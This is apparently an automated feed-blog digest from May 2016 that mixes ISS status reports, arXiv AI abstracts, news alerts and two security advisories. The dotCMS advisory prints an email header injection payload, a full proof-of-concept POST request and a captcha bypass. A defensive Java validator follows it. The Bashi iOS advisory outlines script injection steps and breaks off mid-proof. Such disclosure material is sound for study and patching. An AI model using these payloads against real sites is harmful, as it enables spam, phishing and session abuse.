MORZE. Evaluation using SPRUT-2 Calf Volume Measurement / r/g 2338 FINEMOTR Operator Assistance with the Experiment Folding ARED Platform Node 3 Aft Pressurization and Leak Check RR-HAB BAG Rodent Research Habitat Stowage Bag Retrieval Sample Insertion into bags COSMOCARD. Closeout Ops / r/g 2335 Node 3 Aft Hatch Opening Rodent Research (RR) Camcorder Setup FINEMOTR Experiment Ops Stowage of Rodent Research Habitat Module Removal and transfer of CBM disk cover MORZE. Psycho-physiological Evaluation: Tsentrovka, SENSOR Tests Removal of Node 3 Nadir CBM Controller Panel Assembly (CPA) Study of veins in lower extremities / r/g 2337 Rodent Research (RR) Module Stowage OCT Hardware Setup СОЖ Maintenance WRS Sample Collection BEAM Ground Strap Installation HABIT Habitability Walk-Through Video Inspection and Photos of space behind SM panels / r/g 2334 DOSETRK Data Input MORZE. Psycho-physiological Evaluation: SUPOS Test BEAM Vestibule Outfitting Part 1 VIZIR.
Experiment Ops with СКПФУ Hardware r/g 2352 MORZE. Psycho-physiological Evaluation: Cattell’s Test Health Management System (HMS) Optical Coherence Tomography (OCT) Subject Health Management System (HMS) Optical Coherence Tomography (OCT), Operator MORZE. Psycho-physiological Evaluation: Strelau Test OCT Hardware Stowage Rodent Research (RR) Camcorder Setup BEAM Deployment Dynamic Sensors (DDS) Setup MORZE. Closeout Ops Robotic Work Station (RWS) Setup ARED Footplate Unfold to Nominal Position Potable Water Collection in SM for In-Flight Chemical and Microbial Analysis HMS Defibrillator Inspection MSG Video Recording Stowage of Rodent Research Habitat Module TOCA Potable Water Dispenser (PWD) Sample Analysis DOSETRK Data Input JEM Remote Sensor Unit Battery R&R Rodent Research (RR) Module Stowage HABIT Preparing for the experiment PK4 HD Data Download Life On The Station Photo and Video / r/g 2000 PK4- Preparation for Data Download Water Processing using MCD Inspection and Cleaning of Laptops RS2, RS3 СТТС comm system switchover to the primary set On MCC Go Inspection and Cleaning of RS1 Laptop Inspection and Photos of space behind SM panels / r/g 2334 AUT Sample Retrieval from MELFI AUT R2 Sample fixative application TOCA Data Recording MSG Video Recording Countermeasures System (CMS) Sprint Exercise, Optional IMS Delta File Prep INTERACTION-2. Experiment Ops / r/g 2349 MORZE. Experiment setup / r/g 2348 MSG  Hardware Deactivation USOS High Definition (HD) Video setup for PAO Crew Prep for PAO/ r/g 2356 TV Greetings to the Participants of Pressa-2016 Festival r/g 2356   Completed Task List Items WHC KTO R&R   Ground Activities All activities were completed unless otherwise noted. 
BEAM activities SPDM OTCM checkout Nominal ground commanding

Three-Day Look Ahead:

- Thursday, 05/26: BEAM leak check, inflation, deploy, EMCS water pump tube install, Cygnus cargo transfer
- Friday, 05/27: Vascular Echo ultrasound, Ocular Health, Cygnus cargo transfer
- Saturday, 05/28: Crew off duty, housekeeping

QUICK ISS Status – Environmental Control Group:

| Component | Status |
|---|---|
| Elektron | On |
| Vozdukh | Manual |
| [СКВ] 1 – SM Air Conditioner System (“SKV1”) | Off |
| [СКВ] 2 – SM Air Conditioner System (“SKV2”) | Off |
| Carbon Dioxide Removal Assembly (CDRA) Lab | Standby |
| Carbon Dioxide Removal Assembly (CDRA) Node 3 | Operate |
| Major Constituent Analyzer (MCA) Lab | Idle |
| Major Constituent Analyzer (MCA) Node 3 | Operate |
| Oxygen Generation Assembly (OGA) | Process |
| Urine Processing Assembly (UPA) | Standby |
| Trace Contaminant Control System (TCCS) Lab | Off |
| Trace Contaminant Control System (TCCS) Node 3 | Full Up |

from ISS On-Orbit Status Report http://ift.tt/20FF9zt
via IFTTT

Anonymous

Buy Anonymous [DLC] for PS4 from PlayStation®Store Canada for $2.99. Download PlayStation® games and DLC to PS4™, PS3™, and PS Vita.

from Google Alert - anonymous http://ift.tt/20Ey7ep
via IFTTT

NGC 5078 and Friends


This sharp telescopic field of view holds two bright galaxies. Barred spiral NGC 5101 (top right) and nearly edge-on system NGC 5078 are separated on the sky by about 0.5 degrees or about the apparent width of a full moon. Found within the boundaries of the serpentine constellation Hydra, both are estimated to be around 90 million light-years away and similar in size to our own large Milky Way galaxy. In fact, if they both lie at the same distance their projected separation would be only 800,000 light-years or so. That's easily less than half the distance between the Milky Way and the Andromeda Galaxy. NGC 5078 is interacting with a smaller companion galaxy, cataloged as IC 879, seen just left of the larger galaxy's bright core. Even more distant background galaxies are scattered around the colorful field. Some are even visible right through the face-on disk of NGC 5101. But the prominent spiky stars are in the foreground, well within our own Milky Way. via NASA http://ift.tt/1WOiTos

Re: [FD] Teampass v2.1.26 - Stored Cross Site Scripting Vulnerability

[FD] CVE-2016-4803 dotCMS - Email Header Injection

Title: CVE-2016-4803 dotCMS - Email Header Injection
Credit: Elar Lang / http://ift.tt/1WV5vQa
Vulnerability: Email Header Injection
Vulnerable version: before 3.5 / 3.3.2
CVE: CVE-2016-4803
Vendor: dotCMS (http://dotcms.com/)

# Description

dotCMS has an email sending functionality at path /dotCMS/sendEmail/

Some parameters are vulnerable to Email Header Injection.

# Preconditions

There is no pre-condition on authentication or on authorization to access this functionality.

If captcha is required for the web page, then the only precondition would be captcha. However, captcha is renewed only when you access the captcha image - in other words, you can load it once and manually set the correct value. After this step the "captcha effect" is bypassed.

# Proof-of-Concept

Proof-of-Concept is made on dotCMS demo site with dotCMS version 3.2.1 on 7th of December 2015.

## Value for subject (%0D%0A is for \r\n):

```
subject=subject%0D%0AX-PoC-of-New-Line%3A+True
```

## Proof-of-Concept POST request:

```
POST /dotCMS/sendEmail HTTP/1.1
Host: demo2.dotcms.com
...
Cookie: _JSESSIONID=998ADA19C99505E75DC6D27A5E84D...; ...
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 218

from=myemail&to=youremail&subject=subject%0D%0AX-PoC-of-New-Line%3A+True&returnUrl=%2F1&invalidCaptchaReturnUrl=%2F2&useCaptcha=true&captcha=hwxc5&comments=some+content&send=Send
```

## Received email source:

```
Message-ID: <1894336506.1449476889789.JavaMail.dotcms@democms1.dotcms.net>
From: myemail
To: youremail
Subject: subject
X-PoC-of-New-Line: True
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=
```

Source: Gmail -> IFTTT-> Blogger
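A server-side check for the header injection described in the dotCMS advisory above, as an added example that is not dotCMS code: it decodes the form body the way a servlet container would and refuses any header-bound field that contains CR, LF or another control character. The class and method names are hypothetical, the form body is constructed from the PoC parameters on this page, and treating `from`, `to` and `subject` as the header-bound fields is an assumption.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.LinkedHashMap;
import java.util.Map;

// Hypothetical helper, not part of dotCMS.
// Needs Java 10+ for URLDecoder.decode(String, Charset).
final class MailHeaderGuard {

    /** Form fields assumed to be copied into mail headers. */
    static final String[] HEADER_FIELDS = {"from", "to", "subject"};

    /** Decodes an application/x-www-form-urlencoded body into its fields. */
    static Map<String, String> parseForm(String body) {
        Map<String, String> fields = new LinkedHashMap<>();
        for (String pair : body.split("&")) {
            if (pair.isEmpty()) {
                continue;
            }
            String[] kv = pair.split("=", 2);
            String key = URLDecoder.decode(kv[0], StandardCharsets.UTF_8);
            String value = kv.length == 2
                    ? URLDecoder.decode(kv[1], StandardCharsets.UTF_8)
                    : "";
            fields.put(key, value);
        }
        return fields;
    }

    /**
     * Returns the value unchanged if it can be written as one header line.
     * CR and LF terminate a header, so a decoded %0D%0A starts a new,
     * attacker-chosen header; other control characters are refused as well.
     */
    static String requireSingleLine(String field, String value) {
        if (value == null || value.isEmpty()) {
            throw new IllegalArgumentException(field + ": missing value");
        }
        for (int i = 0; i < value.length(); i++) {
            char c = value.charAt(i);
            if (Character.isISOControl(c)) {
                throw new IllegalArgumentException(String.format(
                        "%s: control character U+%04X at index %d", field, (int) c, i));
            }
        }
        return value;
    }

    public static void main(String[] args) {
        // Constructed sample: the header-related parameters of the PoC request.
        String body = "from=myemail&to=youremail"
                + "&subject=subject%0D%0AX-PoC-of-New-Line%3A+True"
                + "&comments=some+content";
        Map<String, String> form = parseForm(body);
        for (String field : HEADER_FIELDS) {
            try {
                requireSingleLine(field, form.get(field));
                System.out.println(field + ": accepted");
            } catch (IllegalArgumentException e) {
                System.out.println("rejected " + e.getMessage());
            }
        }
    }
}
```

The check runs on the decoded value, since the percent-encoded form contains no literal line break; the message body (`comments`) is deliberately left out because line breaks are legitimate there.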

Wednesday, May 25, 2016

I have a new follower on Twitter


Kloete Group, Inc.
Executive Search placing quality Leaders w/ proven 8 step Talent Acquisition process & research helping our clients crush their goals & exceed expectations.
Greater Nashville Area
https://t.co/BDc9gurz0F
Following: 1883 - Followers: 2136

May 25, 2016 at 09:54PM via Twitter http://twitter.com/KloeteGroup

Learning Purposeful Behaviour in the Absence of Rewards. (arXiv:1605.07700v1 [cs.LG])

Artificial intelligence is commonly defined as the ability to achieve goals in the world. In the reinforcement learning framework, goals are encoded as reward functions that guide agent behaviour, and the sum of observed rewards provides a notion of progress. However, some domains have no such reward signal, or have a reward signal so sparse as to appear absent. Without reward feedback, agent behaviour is typically random, often dithering aimlessly and lacking intentionality. In this paper we present an algorithm capable of learning purposeful behaviour in the absence of rewards. The algorithm proceeds by constructing temporally extended actions (options), through the identification of purposes that are "just out of reach" of the agent's current behaviour. These purposes establish intrinsic goals for the agent to learn, ultimately resulting in a suite of behaviours that encourage the agent to visit different parts of the state space. Moreover, the approach is particularly suited for settings where rewards are very sparse, and such behaviours can help in the exploration of the environment until reward is observed.



from cs.AI updates on arXiv.org http://ift.tt/1qKphiH
via IFTTT

Yum-me: Personalized Healthy Meal Recommender System. (arXiv:1605.07722v1 [cs.HC])

Many ubiquitous computing projects have addressed health and wellness behaviors such as healthy eating. Healthy meal recommendations have the potential to help individuals prevent or manage conditions such as diabetes and obesity. However, learning people's food preferences and making healthy recommendations that appeal to their palate is challenging. Existing approaches either only learn high-level preferences or require a prolonged learning period. We propose Yum-me, a personalized healthy meal recommender system designed to meet individuals' health goals, dietary restrictions, and fine-grained food preferences. Marrying ideas from user preference learning and healthy eating promotion, Yum-me enables a simple and accurate food preference profiling procedure via an image-based online learning framework, and projects the learned profile into the domain of healthy food options to find ones that will appeal to the user. We present the design and implementation of Yum-me, and further discuss the most critical component of it: FoodDist, a state-of-the-art food image analysis model. We demonstrate FoodDist's superior performance through careful benchmarking, and discuss its applicability across a wide array of dietary applications. We validate the feasibility and effectiveness of Yum-me through a 60-person user study, in which Yum-me improves the recommendation acceptance rate by 42.63% over the traditional food preference survey.



from cs.AI updates on arXiv.org http://ift.tt/1TFeBMP
via IFTTT

Data Programming: Creating Large Training Sets, Quickly. (arXiv:1605.07723v1 [stat.ML])

Large labeled training sets are the critical building blocks of supervised learning methods and are key enablers of deep learning techniques. For some applications, creating labeled training sets is the most time-consuming and expensive part of applying machine learning. We therefore propose a paradigm for the programmatic creation of training sets called data programming in which users provide a set of labeling functions, which are programs that heuristically label large subsets of data points, albeit noisily. By viewing these labeling functions as implicitly describing a generative model for this noise, we show that we can recover the parameters of this model to "denoise" the training set. Then, we show how to modify a discriminative loss function to make it noise-aware. We demonstrate our method over a range of discriminative models including logistic regression and LSTMs. We establish theoretically that we can recover the parameters of these generative models in a handful of settings. Experimentally, on the 2014 TAC-KBP relation extraction challenge, we show that data programming would have obtained a winning score, and also show that applying data programming to an LSTM model leads to a TAC-KBP score almost 6 F1 points over a supervised LSTM baseline (and into second place in the competition). Additionally, in initial user studies we observed that data programming may be an easier way to create machine learning models for non-experts.



from cs.AI updates on arXiv.org http://ift.tt/1NObZwP
via IFTTT

Small Representations of Big Kidney Exchange Graphs. (arXiv:1605.07728v1 [cs.AI])

Kidney exchanges are organized markets where patients swap willing but incompatible donors. In the last decade, kidney exchanges grew from small and regional to large and national---and soon, international. This growth results in more lives saved, but exacerbates the empirical hardness of the $\mathcal{NP}$-complete problem of optimally matching patients to donors. State-of-the-art matching engines use integer programming techniques to clear fielded kidney exchanges, but these methods must be tailored to specific models and objective functions, and may fail to scale to larger exchanges. In this paper, we observe that if the kidney exchange compatibility graph can be encoded by a constant number of patient and donor attributes, the clearing problem is solvable in polynomial time. We give necessary and sufficient conditions for losslessly shrinking the representation of an arbitrary compatibility graph. Then, using real compatibility graphs from the UNOS nationwide kidney exchange, we show how many attributes are needed to encode real compatibility graphs. The experiments show that, indeed, small numbers of attributes suffice.



from cs.AI updates on arXiv.org http://ift.tt/1WUDacF
via IFTTT

Learning Multiagent Communication with Backpropagation. (arXiv:1605.07736v1 [cs.LG])

Many tasks in AI require the collaboration of multiple agents. Typically, the communication protocol between agents is manually specified and not altered during training. In this paper we explore a simple neural model, called CommNN, that uses continuous communication for fully cooperative tasks. The model consists of multiple agents and the communication between them is learned alongside their policy. We apply this model to a diverse set of tasks, demonstrating the ability of the agents to learn to communicate amongst themselves, yielding improved performance over non-communicative agents and baselines. In some cases, it is possible to interpret the language devised by the agents, revealing simple but effective strategies for solving the task at hand.



from cs.AI updates on arXiv.org http://ift.tt/1NObZx1
via IFTTT

Dimension Projection among Languages based on Pseudo-relevant Documents for Query Translation. (arXiv:1605.07844v1 [cs.IR])

Taking advantage of top-ranked documents in response to a query for improving quality of query translation has been shown to be an effective approach for cross-language information retrieval. In this paper, we propose a new method for query translation based on dimension projection of embedded vectors from the pseudo-relevant documents in the source language to their equivalents in the target language. To this end, first we learn low-dimensional representations of the words in the pseudo-relevant collections separately and then aim at finding a query-dependent transformation matrix between the vectors of translation pairs. At the next step, representation of each query term is projected to the target language and then, after using a softmax function, a query-dependent translation model is built. Finally, the model is used for query translation. Our experiments on four CLEF collections in French, Spanish, German, and Persian demonstrate that the proposed method outperforms all competitive baselines in language modelling, particularly when it is combined with a collection-dependent translation model.



from cs.AI updates on arXiv.org http://ift.tt/1TFe8Kp
via IFTTT

Automatic Extraction of Causal Relations from Natural Language Texts: A Comprehensive Survey. (arXiv:1605.07895v1 [cs.AI])

Automatic extraction of cause-effect relationships from natural language texts is a challenging open problem in Artificial Intelligence. Most of the early attempts at its solution used manually constructed linguistic and syntactic rules on small and domain-specific data sets. However, with the advent of big data, the availability of affordable computing power and the recent popularization of machine learning, the paradigm to tackle this problem has slowly shifted. Machines are now expected to learn generic causal extraction rules from labelled data with minimal supervision, in a domain-independent manner. In this paper, we provide a comprehensive survey of causal relation extraction techniques from both paradigms, and analyse their relative strengths and weaknesses, with recommendations for future work.



from cs.AI updates on arXiv.org http://ift.tt/1WUDpo0
via IFTTT

Automatic Open Knowledge Acquisition via Long Short-Term Memory Networks with Feedback Negative Sampling. (arXiv:1605.07918v1 [cs.CL])

Previous studies in Open Information Extraction (Open IE) are mainly based on extraction patterns. They manually define patterns or automatically learn them from a large corpus. However, these approaches are limited when grasping the context of a sentence, and they fail to capture implicit relations. In this paper, we address this problem with the following methods. First, we exploit long short-term memory (LSTM) networks to extract higher-level features along the shortest dependency paths, connecting headwords of relations and arguments. The path-level features from LSTM networks provide useful clues regarding contextual information and the validity of arguments. Second, we constructed samples to train LSTM networks without the need for manual labeling. In particular, feedback negative sampling picks highly negative samples among non-positive samples through a model trained with positive samples. The experimental results show that our approach produces more precise and abundant extractions than state-of-the-art open IE systems. To the best of our knowledge, this is the first work to apply deep learning to Open IE.



from cs.AI updates on arXiv.org http://ift.tt/1TFeAbJ
via IFTTT

Adaptive Neural Compilation. (arXiv:1605.07969v1 [cs.AI])

This paper proposes an adaptive neural-compilation framework to address the problem of efficient program learning. Traditional code optimisation strategies used in compilers are based on applying a pre-specified set of transformations that make the code faster to execute without changing its semantics. In contrast, our work involves adapting programs to make them more efficient while considering correctness only on a target input distribution. Our approach is inspired by the recent works on differentiable representations of programs. We show that it is possible to compile programs written in a low-level language to a differentiable representation. We also show how programs in this representation can be optimised to make them efficient on a target distribution of inputs. Experimental results demonstrate that our approach enables learning specifically-tuned algorithms for given data distributions with a high success rate.



from cs.AI updates on arXiv.org http://ift.tt/1NObR0h
via IFTTT

Compliant Conditions for Polynomial Time Approximation of Operator Counts. (arXiv:1605.07989v1 [cs.AI])

In this brief abstract, we develop a computationally simpler version of the operator count heuristic for a particular class of domains. The contribution of this abstract is thus threefold: we (1) propose an efficient closed form approximation to the operator count heuristic; (2) leverage compressed sensing techniques to obtain an integer approximation in polynomial time; and (3) discuss the relationship of the proposed formulation to existing heuristics and investigate properties of domains where such approaches are useful.



from cs.AI updates on arXiv.org http://ift.tt/1WUDmsm
via IFTTT

Toward a general, scaleable framework for Bayesian teaching with applications to topic models. (arXiv:1605.07999v1 [cs.AI])

Machines, not humans, are the world's dominant knowledge accumulators but humans remain the dominant decision makers. Interpreting and disseminating the knowledge accumulated by machines requires expertise, time, and is prone to failure. The problem of how best to convey accumulated knowledge from computers to humans is a critical bottleneck in the broader application of machine learning. We propose an approach based on human teaching where the problem is formalized as selecting a small subset of the data that will, with high probability, lead the human user to the correct inference. This approach, though successful for modeling human learning in simple laboratory experiments, has failed to achieve broader relevance due to challenges in formulating general and scalable algorithms. We propose general-purpose teaching via pseudo-marginal sampling and demonstrate the algorithm by teaching topic models. Simulation results show our sampling-based approach: effectively approximates the probability where ground-truth is possible via enumeration, results in data that are markedly different from those expected by random sampling, and speeds learning especially for small amounts of data. Application to movie synopsis data illustrates differences between teaching and random sampling for teaching distributions and specific topics, and demonstrates gains in scalability and applicability to real-world problems.



from cs.AI updates on arXiv.org http://ift.tt/1NObK56
via IFTTT

Causal inference for cloud computing. (arXiv:1603.01581v2 [cs.AI] UPDATED)

Cloud computing involves complex technical and economical systems and interactions. This brings about various challenges, two of which are: (1) debugging and control of computing systems, based on heterogeneous data, and (2) prediction of performance and price of "spot" resources, allocated via auctions. In this paper, we first establish two theoretical results on approximate causal inference. We then use the first one, approximate counterfactuals, along with established causal methodology, to outline a general framework to address (1). To address (2), we show how the second one, approximate integration of causal knowledge, can in principle provide a tool for cloud clients to trade off privacy against predictability of cloud costs. We report experiments on simulated and real data.



from cs.AI updates on arXiv.org http://ift.tt/1p0WgPt
via IFTTT

One-Shot Generalization in Deep Generative Models. (arXiv:1603.05106v2 [stat.ML] UPDATED)

Humans have an impressive ability to reason about new concepts and experiences from just a single example. In particular, humans have an ability for one-shot generalization: an ability to encounter a new concept, understand its structure, and then be able to generate compelling alternative variations of the concept. We develop machine learning systems with this important capacity by developing new deep generative models, models that combine the representational power of deep learning with the inferential power of Bayesian reasoning. We develop a class of sequential generative models that are built on the principles of feedback and attention. These two characteristics lead to generative models that are among the state-of-the-art in density estimation and image generation. We demonstrate the one-shot generalization ability of our models using three tasks: unconditional sampling, generating new exemplars of a given concept, and generating new exemplars of a family of concepts. In all cases our models are able to generate compelling and diverse samples---having seen new examples just once---providing an important class of general-purpose models for one-shot machine learning.



from cs.AI updates on arXiv.org http://ift.tt/1nPBWiT
via IFTTT

COCO: A Platform for Comparing Continuous Optimizers in a Black-Box Setting. (arXiv:1603.08785v2 [cs.AI] UPDATED)

COCO is a platform for Comparing Continuous Optimizers in a black-box setting. It aims at automatizing the tedious and repetitive task of benchmarking numerical optimization algorithms to the greatest possible extent. We present the rationales behind the development of the platform as a general proposition for a guideline towards better benchmarking. We detail underlying fundamental concepts of COCO such as its definition of a problem, the idea of instances, the relevance of target values, and runtime as central performance measure. Finally, we give a quick overview of the basic code structure and the available test suites.



from cs.AI updates on arXiv.org http://ift.tt/1MzUfo5
via IFTTT

COCO: The Bi-objective Black Box Optimization Benchmarking (bbob-biobj) Test Suite. (arXiv:1604.00359v2 [cs.AI] UPDATED)

The bbob-biobj test suite contains 55 bi-objective functions in continuous domain which are derived from combining functions of the well-known single-objective noiseless bbob test suite. Besides giving the actual function definitions and presenting their (known) properties, this documentation also aims at giving the rationale behind our approach in terms of function groups, instances, and potential objective space normalization.



from cs.AI updates on arXiv.org http://ift.tt/1RHmwWP
via IFTTT

Distributed Clustering of Linear Bandits in Peer to Peer Networks. (arXiv:1604.07706v2 [cs.LG] UPDATED)

We provide two distributed confidence ball algorithms for solving linear bandit problems in peer to peer networks with limited communication capabilities. For the first, we assume that all the peers are solving the same linear bandit problem, and prove that our algorithm achieves the optimal asymptotic regret rate of any centralised algorithm that can instantly communicate information between the peers. For the second, we assume that there are clusters of peers solving the same bandit problem within each cluster, and we prove that our algorithm discovers these clusters, while achieving the optimal asymptotic regret rate within each one. Through experiments on several real-world datasets, we demonstrate the performance of proposed algorithms compared to the state-of-the-art.



from cs.AI updates on arXiv.org http://ift.tt/1WoMi7e
via IFTTT

When Anonymous Grading is on, hide Student Name in Gradebook

Although it is tantalizingly close, turning on Canvas Studio: Anonymous Grading ("AG") alone does not guarantee anonymity to students using ...

from Google Alert - anonymous http://ift.tt/1saMa02
via IFTTT

Anonymous user cart not clearing - Exposing sensitive user info

Example Scenario: An anonymous user, using a public computer, adds products to cart. They then fill in sensitive user information such as shipping ...

from Google Alert - anonymous http://ift.tt/1UdZg5N
via IFTTT

Ravens: OL John Urschel tweets that he got straight A's in the four Ph.D. classes he took in his first semester at MIT (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Question about OV Anonymous Chip card - North Holland Province Forum

If I buy an empty anonymous chipcard at, say Albert Heine (spelling), is there anyplace in Amsterdam to load the card with a US credit card or cash ...

from Google Alert - anonymous http://ift.tt/1TEm6Um
via IFTTT

Oregon Veteran Surprised by Anonymous Gift

Seeing the struggling veteran attempting to mow the lawn with a push mower, an anonymous neighbor decided to step up and provide the family ...

from Google Alert - anonymous http://ift.tt/1OX2ITs
via IFTTT

I have a new follower on Twitter


ComSec
Global Counterespionage Specialists | Cyber TSCM
United States of America
https://t.co/Bf9FOt0RbG
Following: 597 - Followers: 1717

May 25, 2016 at 11:29AM via Twitter http://twitter.com/comsec

Apple hires Encryption Expert to Beef Up Security on its Devices

The FBI and other law enforcement agencies have waged legal war on encryption and privacy technologies. You may have heard many news stories about the legal battle between Apple and the FBI over unlocking an iPhone that belonged to the San Bernardino shooter. However, that was just one battle in a much larger fight. Now, in an effort to make its iPhone surveillance-and-hack


from The Hacker News http://ift.tt/1Tyjfzc
via IFTTT

ISS Daily Summary Report – 05/24/16

Marrow: Upon waking this morning, the crew took breath and ambient air samples for the Canadian Space Agency (CSA) Marrow experiment which investigates the effect of microgravity on human bone marrow. It is believed that microgravity, like long-duration bed rest on Earth, has a negative effect on bone marrow and the blood cells that are produced in the marrow. The extent of this effect and its recovery are of interest to space research and healthcare providers on Earth.

Rodent Research (RR-3) Inventory Audit: The crew continued auditing the remaining RR-3 equipment and supplies. The audit follows the completion of RR-3 operations last week.

Ocular Health (OH) Cardiac Operations: The crew began the first of two Ocular Health sessions planned for the week by using a Tonometer on an eye simulator before conducting Tonometry exams. They also performed blood pressure measurements using the Cardiolab (CDL) Holter Arterial Blood Pressure (BP) Unit with guidance from the Ocular Health ground team. Crew members’ bodies change in a variety of ways during space flight, and some experience impaired vision. The Ocular Health investigation gathers data on crew members’ visual health during and after long-duration space station missions. Tests monitor microgravity-induced visual impairment, as well as changes believed to result from elevated intracranial pressure. The investigation will measure how long it takes for crew members to return to normal after they return to Earth.

Cardio Ox Ultrasound Operations: With remote guidance from the Cardio Ox ground teams, the crew conducted an ultrasound scan after attaching the Electro Cardiogram (ECG) Electrodes and marking the arteries followed by blood pressure measurements using the Cardiolab Holter Arterial Blood Pressure Unit. The goal of the Cardio Ox investigation is to determine whether biological markers of oxidative and inflammatory stress are elevated during and after space flight and whether this results in an increased, long-term risk of atherosclerosis in astronauts. Twelve crewmembers provide blood and urine samples to assess biomarkers before launch, 15 and 60 days after launch, 15 days before returning to Earth, and within days after landing. Ultrasound scans of the carotid and brachial arteries are obtained at the same time points as well as through 5 years after landing as an indicator of cardiovascular health.

Micro-Gravity Science Glovebox (MSG) Video Upgrade Equipment (VUE) Setup: The crew upgraded MSG video equipment by replacing the current MSG video drawer with the new High Definition (HD) video drawer before installing two HD video monitors that will be used with the new video drawers.

Dose Tracker: The crew completed entries for medication tracking. This investigation documents the medication usage of crew members before and during their missions by capturing data regarding medication use during spaceflight, including side effect qualities, frequencies and severities. The data is expected to either support or counter anecdotal evidence of medication ineffectiveness during flight and unusual side effects experienced during flight. It is also expected that specific, near-real-time questioning about symptom relief and side effects will provide the data required to establish whether spaceflight-associated alterations in pharmacokinetics (PK) or pharmacodynamics (PD) are occurring during missions.

Bigelow Expandable Aerospace Module (BEAM) Preparations: The crew removed the Node 3 (N3) Aft Hatch Positive Pressure Relief Valve (PPRV) Sample Port Cap and pressurized N3 to BEAM vestibule to 5psi. An 8-hour leak check is currently in work. The crew also reviewed updates to emergency procedures and key points that were emphasized during BEAM training. In preparation for BEAM viewing, Robotics Ground Controllers walked off the Space Station Remote Manipulator System (SSRMS) to the Lab Power Data Grapple Fixture (PDGF).

External robotics: Today, the Space Station Remote Manipulator System (SSRMS) was walked off from Node2 Power Data Grapple Fixture (PDGF) to Lab PDGF, and maneuvered to the BEAM viewing position in preparation for BEAM deployment later this week.

Cygnus cargo operations: 36 hours and 50 minutes of cargo work have been completed, with an estimate of 8 hours and 20 minutes remaining to complete all Cygnus (OA-6) cargo operations.

Today’s Planned Activities
All activities were completed unless otherwise noted.

MARROW – Air Samples Collection MORZE. Examination using SPRUT-2 device HMS – equipment config before intraocular test COSMOCARD. Closeout ops / r/g 2311 VIZIR. СКПИ battery charge / r/g 2320 HMS – vision test COSMOCARD. Preparing for and Starting 24-hr ECG Recording / r/g 2335 HMS – vision test HMS – vision questionnaire OH – blood pressure measurement EDV (KOV) fill (separation) for ELEKTRON or EDV-SV. Fill from Progress 432 Water Tank r/g 2129 MORZE. Psychophysiological survey: testing, centering, SENSOR HMS – vision questionnaire RR- samples retrieval from MELFI OH – blood pressure measurement Soyuz #720 Samsung Tablets Charging – init HMS Tonometry CMO – assist CARDIOVECTOR. Experiment ops r/g 2333 USND2 – hardware activation HMS Tonometry Test – subject SOZh Maintenance CARDOX – prep ops CARDOX- ultrasonic survey Progress #432 АСН-К deinstall, data download to Laptop r/g 2272 DOSETRK- data download CARDOX-ultrasonic survey – assist RR – Habitat Stow Review RR- hardware inventory GREAT START. Experiment prep / r/g 2322 Health Maintenance System (HMS) Tonometry Test Stow GREAT START. Educational Session and Video Shooting on DUBRAVA Experiment  r/g 2322 Checking of Camcorder Setup for Photo/TV CARDOX- blood pressure measurement MORZE.
Psychophysiological Survey: Strelau Test USND2- hardware deactivation GREAT START. Concluding Ops / / r/g 2322 VIZIR. Charging СКПИ Infrared Receiver (ИКП) battery – terminate / r/g 2320 COL Ethernet Cable Disconnect Checking Camcorder Setup for Photo/TV MPCC Laptop Power Connect BEAM Deployment OBT MPCC – Р2 Laptop Activation to LAN Network УРАГАН. Observation and Photography Using Photo Hardware r/g 2336 ESA – weekly crew conference Soyuz #720 Samsung Tablets Charging – terminate USOS window shutters closing PAO – crew prep PAO Event Soyuz #719 Samsung Tablet Charging – init MORZE. Psychophysiological Survey: Kettle Test WRM – water balance placeholder Countermeasures System (CMS) Sprint Exercise Optional MSG- hardware stow after video shooting Sync RS Photo Cameras with on-board time / / r/g 1594 ВОЛ Fan Test Activation – noise level control. […]

from ISS On-Orbit Status Report http://ift.tt/247pnOF
via IFTTT

Hacker Group Anonymous Targets Governor Rick Scott

Hacker Group Anonymous Targets Governor Rick Scott. CBS Miami. Duration: 01:50 11 hrs ago. CBS Miami's ...

from Google Alert - anonymous http://ift.tt/1YYyPCs
via IFTTT

[FD] Bashi v1.6 iOS - Persistent Mail Encoding Vulnerability

Document Title:
===============
Bashi v1.6 iOS - Persistent Mail Encoding Vulnerability

References (Source):
====================
http://ift.tt/1WSlKgZ

Release Date:
=============
2016-05-25

Vulnerability Laboratory ID (VL-ID):
====================================
1852

Common Vulnerability Scoring System:
====================================
3.4

Product & Service Introduction:
===============================
This is an ios bash4.3 app, you can learn, run, share bash 4.3 script. Code templates, the contents of the new file is copy from contents of the template file. In (the built-in browser or the txt editor), select the text to run.

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered an application-side mail encoding web vulnerability in the official Bashi v1.6 iOS mobile application.

Vulnerability Disclosure Timeline:
==================================
2016-05-25: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
XiaoWen Huang
Product: Bashi - iOS Mobile Application 1.6

Exploitation Technique:
=======================
Local

Severity Level:
===============
Medium

Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official Bashi v1.6 iOS mobile application. The security web vulnerability allows to inject malicious script codes on the application-side of the vulnerable iOS mobile app.

The vulnerability is located in the encode mechanism of the `code console` input field. Local attackers with restricted or local low privileged application user accounts are able to inject own malicious script codes to the code console input. This code can be sent by the share function to the author or random emails. The execution of the malicious script code occurs in the mail body message context on sharing by email. The injection point of the vulnerability is the code console compiler input field. The attack vector of the issue is persistent on the application-side and the request method to inject is a basic device sync.

The security risk of the application-side vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. Exploitation of the persistent web vulnerability requires a low privileged ios device account with restricted access and low user interaction. Successful exploitation of the vulnerabilities results in persistent phishing mails, session hijacking, persistent external redirect to malicious sources and application-side manipulation of affected or connected module context.

Vulnerable Module(s):
[+] Code Console

Vulnerable Input(s):
[+] Code Template

Vulnerable Parameter(s):
[+] code

Affected Module(s):
[+] Mail Message Body (Share Function)

Proof of Concept (PoC):
=======================
The application-side validation web vulnerability can be exploited by remote attackers with low privileged iOS device user account and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Install the vulnerable iOS app to your apple device
2. Start the app
3. Click the code module to open the compiler
4. Inject a script code payload to the "$Person" variable in the code-line input field
5. Now, click above the share button and choose send by email
   Note: The payload is getting saved to the mail body message context
6. The execution occurs directly in the mail body of the email context where the code becomes visible via echo
7. Successful reproduce of the vulnerability!

PoC: Code Template - Share

#Note:The template file will be copied to a new file. When you change the code of the template file you can create new file with this base code.
echo 
